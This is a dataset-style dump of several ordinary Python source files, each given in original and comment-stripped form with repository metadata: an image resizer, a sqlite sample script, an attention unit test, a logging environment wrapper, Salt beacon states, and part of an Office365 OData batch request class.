img = Image.open("../foto/"+str(file_name))
if img.size[0] > img.size[1]:
#foto orizzontale
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
else:
#foto verticale
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
img = img.resize((hsize, vsize), Image.ANTIALIAS)
img.save(file_name)
| 26.85
| 53
| 0.636872
|
from PIL import Image
import os
percent = 0.5
for file_name in os.listdir("../foto/"):
if file_name == "pic8.jpg":
img = Image.open("../foto/"+str(file_name))
if img.size[0] > img.size[1]:
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
else:
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
img = img.resize((hsize, vsize), Image.ANTIALIAS)
img.save(file_name)
| true
| true
|
f70796526017f9efdb2926f8a2f313915650ea0a
| 453
|
py
|
Python
|
sql/makedb.py
|
amenoyoya/pyrpn
|
5174cf90f9dc1c43df2d04a0545ce96fe2a434ce
|
[
"MIT"
] | null | null | null |
sql/makedb.py
|
amenoyoya/pyrpn
|
5174cf90f9dc1c43df2d04a0545ce96fe2a434ce
|
[
"MIT"
] | null | null | null |
sql/makedb.py
|
amenoyoya/pyrpn
|
5174cf90f9dc1c43df2d04a0545ce96fe2a434ce
|
[
"MIT"
] | null | null | null |
import sqlite3
from contextlib import closing
with closing(sqlite3.connect('sample.db')) as conn:
c = conn.cursor()
c.execute('create table users (id integer primary key, name varchar, age integer, gender varchar)')
c.executemany('insert into users (name, age, gender) values (?, ?, ?)', [
('Alex', 54, 'male'),
('Nancy', 40, 'female'),
('Tetsu', 16, 'male'),
('Saki', 21, 'female')
])
conn.commit()
| 32.357143
| 103
| 0.593819
|
import sqlite3
from contextlib import closing
with closing(sqlite3.connect('sample.db')) as conn:
c = conn.cursor()
c.execute('create table users (id integer primary key, name varchar, age integer, gender varchar)')
c.executemany('insert into users (name, age, gender) values (?, ?, ?)', [
('Alex', 54, 'male'),
('Nancy', 40, 'female'),
('Tetsu', 16, 'male'),
('Saki', 21, 'female')
])
conn.commit()
| true
| true
|
f70796987ba6b1df037b3a85288d3b9336d7b3b7
| 1,066
|
py
|
Python
|
onmt/tests/test_attention.py
|
deep-spin/SIGMORPHON2019
|
60cf3b53be42e76238e7928405b2916cd9aed6c4
|
[
"MIT"
] | 2
|
2019-07-30T06:50:21.000Z
|
2020-02-05T17:42:06.000Z
|
onmt/tests/test_attention.py
|
deep-spin/SIGMORPHON2019
|
60cf3b53be42e76238e7928405b2916cd9aed6c4
|
[
"MIT"
] | 1
|
2019-08-20T08:57:21.000Z
|
2019-08-21T08:49:48.000Z
|
onmt/tests/test_attention.py
|
deep-spin/SIGMORPHON2019
|
60cf3b53be42e76238e7928405b2916cd9aed6c4
|
[
"MIT"
] | null | null | null |
"""
Here come the tests for attention types and their compatibility
"""
import unittest
import torch
from torch.autograd import Variable
import onmt
class TestAttention(unittest.TestCase):
def test_masked_global_attention(self):
source_lengths = torch.IntTensor([7, 3, 5, 2])
# illegal_weights_mask = torch.ByteTensor([
# [0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 1, 1, 1, 1],
# [0, 0, 0, 0, 0, 1, 1],
# [0, 0, 1, 1, 1, 1, 1]])
batch_size = source_lengths.size(0)
dim = 20
memory_bank = Variable(torch.randn(batch_size,
source_lengths.max(), dim))
hidden = Variable(torch.randn(batch_size, dim))
attn = onmt.modules.Attention(dim)
_, alignments = attn(hidden, memory_bank,
memory_lengths=source_lengths)
# TODO: fix for pytorch 0.3
# illegal_weights = alignments.masked_select(illegal_weights_mask)
# self.assertEqual(0.0, illegal_weights.data.sum())
| 28.810811
| 74
| 0.578799
|
import unittest
import torch
from torch.autograd import Variable
import onmt
class TestAttention(unittest.TestCase):
def test_masked_global_attention(self):
source_lengths = torch.IntTensor([7, 3, 5, 2])
batch_size = source_lengths.size(0)
dim = 20
memory_bank = Variable(torch.randn(batch_size,
source_lengths.max(), dim))
hidden = Variable(torch.randn(batch_size, dim))
attn = onmt.modules.Attention(dim)
_, alignments = attn(hidden, memory_bank,
memory_lengths=source_lengths)
| true
| true
|
f70796dac00ff61d01f1195184eb507855798a0c
| 8,878
|
py
|
Python
|
moog/env_wrappers/logger.py
|
jazlab/moog.github.io
|
3e89e46a5918d59475851f9d4f1558956c110d38
|
[
"Apache-2.0",
"MIT"
] | 22
|
2021-02-26T18:19:35.000Z
|
2022-03-05T19:01:00.000Z
|
moog/env_wrappers/logger.py
|
jazlab/moog.github.io
|
3e89e46a5918d59475851f9d4f1558956c110d38
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-04-01T06:15:02.000Z
|
2021-04-23T13:14:12.000Z
|
moog/env_wrappers/logger.py
|
jazlab/moog.github.io
|
3e89e46a5918d59475851f9d4f1558956c110d38
|
[
"Apache-2.0",
"MIT"
] | 2
|
2021-05-02T02:20:39.000Z
|
2021-05-06T16:24:35.000Z
|
"""Environment wrapper class for logging episodes.
This can be used to record data from a subject playing the task. See
../../moog_demos/restore_logged_data.py for an example of how to read log files.
Note: This logger records everything about the environment, which can be a lot
of data (depending on the task). If you plan to use this at scale for recording
subjects' or agents' behavior, we recommend forking this and modifying it to
only log the data that you need to do analyses for your specific task. For
example you may not want to log the positions/velocities of static sprites
(e.g. walls), or may not want to log all the attributes of sprites every
timestep (e.g. if you know that the colors of the sprites don't change in your
task).
"""
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
# This is the number of numerals in filenames. Since there is one file per
# episode, you should pick _FILENAME_ZFILL large enough that the number of
# episodes in your dataset is less than 10^_FILENAME_ZFILL.
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
"""Serialize a value x.
This is used to serialize sprite attributes, actions, and meta_state so that
they are json-writable.
Specifically, numpy arrays are not JSON serializable, so we must convert
numpy arrays to lists. This function is recursive to handle nestings inside
of lists/tuples/dictionaries.
Args:
x: Value to serialize.
Returns:
Serialized value that can be JSON dumped.
"""
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple([_serialize(a) for a in x])
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
"""Environment class for logging timesteps.
This logger produces a description of the log in 'description.txt' of
log_dir, so please refer to that for a detailed account of the structure of
the logs.
"""
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
"""Constructor.
Args:
environment: Instance of ../moog/environment.Environment.
log_dir: String. Log directory relative to working directory.
log_vertices: String. Of the following options:
* 'NEVER'. In this case, never log sprite vertices.
* 'WHEN_NECESSARY'. In this case, log sprite vertices when a
sprite has either just appeared or just changed shape. In
this way, the vertices of a sprite can always be inferred
from the current position/angle/aspect_ratio and the
vertices that were logged for that sprite (identifiable by
its id) the last time its vertices were logged.
* 'ALWAYS'. Log vertices for all sprites every timestep.
"""
super(LoggingEnvironment, self).__init__(environment)
# Make sure log_vertices is a valid value
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
# Set the logging directory
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
# These are the attributes that we'll log
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
"""Log a description of the data to a description.txt file."""
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of four elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state`], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
"""Serialize a sprite as a list of attributes."""
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
"""Serialized a state."""
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
"""Step the environment with an action, logging timesteps."""
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
| 39.457778
| 80
| 0.614553
|
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple([_serialize(a) for a in x])
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
super(LoggingEnvironment, self).__init__(environment)
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of four elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state`], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
| true
| true
|
f707972a59bc041da7ae5f9e61e1bed189a32c66
| 7,271
|
py
|
Python
|
salt/states/beacon.py
|
nizD/salt
|
bbe135d62d8d8b4e4a7d0362097e1b3a3b092bed
|
[
"Apache-2.0"
] | 1
|
2020-12-28T09:48:52.000Z
|
2020-12-28T09:48:52.000Z
|
salt/states/beacon.py
|
nizD/salt
|
bbe135d62d8d8b4e4a7d0362097e1b3a3b092bed
|
[
"Apache-2.0"
] | 2
|
2021-04-30T21:36:41.000Z
|
2021-12-13T20:50:09.000Z
|
salt/states/beacon.py
|
nizD/salt
|
bbe135d62d8d8b4e4a7d0362097e1b3a3b092bed
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Management of the Salt beacons
==============================
.. versionadded:: 2015.8.0
.. code-block:: yaml
ps:
beacon.present:
- save: True
- enable: False
- services:
salt-master: running
apache2: stopped
sh:
beacon.present: []
load:
beacon.present:
- averages:
1m:
- 0.0
- 2.0
5m:
- 0.0
- 1.5
15m:
- 0.1
- 1.0
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt libs
from salt.ext import six
import logging
log = logging.getLogger(__name__)
def present(name,
save=False,
**kwargs):
'''
Ensure beacon is configured with the included beacon data.
name
The name of the beacon ensure is configured.
save
True/False, if True the beacons.conf file be updated too. Default is False.
'''
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
beacon_data = [{k: v} for k, v in six.iteritems(kwargs)]
if name in current_beacons:
if beacon_data == current_beacons[name]:
ret['comment'].append('Job {0} in correct state'.format(name))
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
ret['changes'] = result['changes']
else:
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
if 'changes' in result:
ret['comment'].append('Modifying {0} in beacons'.format(name))
ret['changes'] = result['changes']
else:
ret['comment'].append(result['comment'])
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Adding {0} to beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def absent(name,
save=False,
**kwargs):
'''
Ensure beacon is absent.
name
The name of the beacon ensured absent.
save
True/False, if True the beacons.conf file be updated too. Default is False.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.delete'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.delete'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Removed {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not configured in beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def enabled(name, **kwargs):
'''
Enable a beacon.
name
The name of the beacon to enable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.enable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.enable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Enabled {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not a configured beacon'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def disabled(name, **kwargs):
'''
Disable a beacon.
name
The name of the beacon to disable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.disable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.disable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Disabled beacon {0}.'.format(name))
else:
ret['comment'].append('Job {0} is not configured.'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
| 30.809322
| 86
| 0.527438
|
from __future__ import absolute_import, print_function, unicode_literals
from salt.ext import six
import logging
log = logging.getLogger(__name__)
def present(name,
save=False,
**kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
beacon_data = [{k: v} for k, v in six.iteritems(kwargs)]
if name in current_beacons:
if beacon_data == current_beacons[name]:
ret['comment'].append('Job {0} in correct state'.format(name))
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
ret['changes'] = result['changes']
else:
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
if 'changes' in result:
ret['comment'].append('Modifying {0} in beacons'.format(name))
ret['changes'] = result['changes']
else:
ret['comment'].append(result['comment'])
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Adding {0} to beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def absent(name,
save=False,
**kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.delete'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.delete'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Removed {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not configured in beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def enabled(name, **kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.enable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.enable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Enabled {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not a configured beacon'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def disabled(name, **kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.disable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.disable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Disabled beacon {0}.'.format(name))
else:
ret['comment'].append('Job {0} is not configured.'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
| true
| true
|
f707986dc8a90584a7e3d4ebd3b0ed227a87eafe
| 5,499
|
py
|
Python
|
office365/runtime/odata/odata_batch_request.py
|
andrewcchoi/Office365-REST-Python-Client
|
43db12ae532c804c75a3a34f7b0d7d79e30fdac3
|
[
"MIT"
] | null | null | null |
office365/runtime/odata/odata_batch_request.py
|
andrewcchoi/Office365-REST-Python-Client
|
43db12ae532c804c75a3a34f7b0d7d79e30fdac3
|
[
"MIT"
] | null | null | null |
office365/runtime/odata/odata_batch_request.py
|
andrewcchoi/Office365-REST-Python-Client
|
43db12ae532c804c75a3a34f7b0d7d79e30fdac3
|
[
"MIT"
] | null | null | null |
import json
import re
from email import message_from_bytes
from email.message import Message
from office365.runtime.client_request import ClientRequest
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.http.request_options import RequestOptions
from office365.runtime.queries.batch_query import BatchQuery, create_boundary
class ODataBatchRequest(ClientRequest):
def __init__(self, context):
super(ODataBatchRequest, self).__init__(context)
def build_request(self, query):
"""
:type query: office365.runtime.queries.client_query.BatchQuery
"""
url = "{0}$batch".format(self.context.service_root_url())
request = RequestOptions(url)
request.method = HttpMethod.Post
media_type = "multipart/mixed"
content_type = "; ".join([media_type, "boundary={0}".format(query.current_boundary)])
request.ensure_header('Content-Type', content_type)
request.data = self._prepare_payload(query).as_bytes()
return request
def process_response(self, response, query):
"""Parses an HTTP response.
:type response: requests.Response
:type query: office365.runtime.queries.client_query.BatchQuery
"""
content_id = 0
for response_info in self._read_response(response):
if response_info["content"] is not None:
qry = query.get(content_id)
self.context.pending_request().map_json(response_info["content"], qry.return_type)
content_id += 1
def _read_response(self, response):
"""Parses a multipart/mixed response body from from the position defined by the context.
:type response: requests.Response
"""
content_type = response.headers['Content-Type'].encode("ascii")
http_body = (
b"Content-Type: "
+ content_type
+ b"\r\n\r\n"
+ response.content
)
message = message_from_bytes(http_body) # type: Message
for raw_response in message.get_payload():
if raw_response.get_content_type() == "application/http":
yield self._deserialize_response(raw_response)
def _prepare_payload(self, query):
"""Serializes a batch request body.
:type query BatchQuery
"""
main_message = Message()
main_message.add_header("Content-Type", "multipart/mixed")
main_message.set_boundary(query.current_boundary)
if query.has_change_sets:
change_set_message = Message()
change_set_boundary = create_boundary("changeset_", True)
change_set_message.add_header("Content-Type", "multipart/mixed")
change_set_message.set_boundary(change_set_boundary)
for qry in query.change_sets:
request = qry.build_request()
message = self._serialize_request(request)
change_set_message.attach(message)
main_message.attach(change_set_message)
for qry in query.get_queries:
request = qry.build_request()
message = self._serialize_request(request)
main_message.attach(message)
return main_message
@staticmethod
def _normalize_headers(headers_raw):
headers = {}
for header_line in headers_raw:
k, v = header_line.split(":", 1)
headers[k] = v
return headers
def _deserialize_response(self, raw_response):
response = raw_response.get_payload(decode=True)
lines = list(filter(None, response.decode("utf-8").split("\r\n")))
response_status_regex = "^HTTP/1\\.\\d (\\d{3}) (.*)$"
status_result = re.match(response_status_regex, lines[0])
status_info = status_result.groups()
# validate for errors
if int(status_info[0]) >= 400:
raise ValueError(response)
if status_info[1] == "No Content" or len(lines) < 3:
headers_raw = lines[1:]
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": None
}
else:
*headers_raw, content = lines[1:]
content = json.loads(content)
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": content
}
@staticmethod
def _serialize_request(request):
"""Serializes a part of a batch request to a string. A part can be either a GET request or
a change set grouping several CUD (create, update, delete) requests.
:type request: RequestOptions
"""
eol = "\r\n"
method = request.method
if "X-HTTP-Method" in request.headers:
method = request.headers["X-HTTP-Method"]
lines = ["{method} {url} HTTP/1.1".format(method=method, url=request.url),
*[':'.join(h) for h in request.headers.items()]]
if request.data:
lines.append(eol)
lines.append(json.dumps(request.data))
buffer = eol + eol.join(lines) + eol
payload = buffer.encode('utf-8').lstrip()
message = Message()
message.add_header("Content-Type", "application/http")
message.add_header("Content-Transfer-Encoding", "binary")
message.set_payload(payload)
return message
| 36.90604
| 98
| 0.62084
|
import json
import re
from email import message_from_bytes
from email.message import Message
from office365.runtime.client_request import ClientRequest
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.http.request_options import RequestOptions
from office365.runtime.queries.batch_query import BatchQuery, create_boundary
class ODataBatchRequest(ClientRequest):
def __init__(self, context):
super(ODataBatchRequest, self).__init__(context)
def build_request(self, query):
url = "{0}$batch".format(self.context.service_root_url())
request = RequestOptions(url)
request.method = HttpMethod.Post
media_type = "multipart/mixed"
content_type = "; ".join([media_type, "boundary={0}".format(query.current_boundary)])
request.ensure_header('Content-Type', content_type)
request.data = self._prepare_payload(query).as_bytes()
return request
def process_response(self, response, query):
content_id = 0
for response_info in self._read_response(response):
if response_info["content"] is not None:
qry = query.get(content_id)
self.context.pending_request().map_json(response_info["content"], qry.return_type)
content_id += 1
def _read_response(self, response):
content_type = response.headers['Content-Type'].encode("ascii")
http_body = (
b"Content-Type: "
+ content_type
+ b"\r\n\r\n"
+ response.content
)
message = message_from_bytes(http_body) for raw_response in message.get_payload():
if raw_response.get_content_type() == "application/http":
yield self._deserialize_response(raw_response)
def _prepare_payload(self, query):
main_message = Message()
main_message.add_header("Content-Type", "multipart/mixed")
main_message.set_boundary(query.current_boundary)
if query.has_change_sets:
change_set_message = Message()
change_set_boundary = create_boundary("changeset_", True)
change_set_message.add_header("Content-Type", "multipart/mixed")
change_set_message.set_boundary(change_set_boundary)
for qry in query.change_sets:
request = qry.build_request()
message = self._serialize_request(request)
change_set_message.attach(message)
main_message.attach(change_set_message)
for qry in query.get_queries:
request = qry.build_request()
message = self._serialize_request(request)
main_message.attach(message)
return main_message
@staticmethod
def _normalize_headers(headers_raw):
headers = {}
for header_line in headers_raw:
k, v = header_line.split(":", 1)
headers[k] = v
return headers
def _deserialize_response(self, raw_response):
response = raw_response.get_payload(decode=True)
lines = list(filter(None, response.decode("utf-8").split("\r\n")))
response_status_regex = "^HTTP/1\\.\\d (\\d{3}) (.*)$"
status_result = re.match(response_status_regex, lines[0])
status_info = status_result.groups()
if int(status_info[0]) >= 400:
raise ValueError(response)
if status_info[1] == "No Content" or len(lines) < 3:
headers_raw = lines[1:]
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": None
}
else:
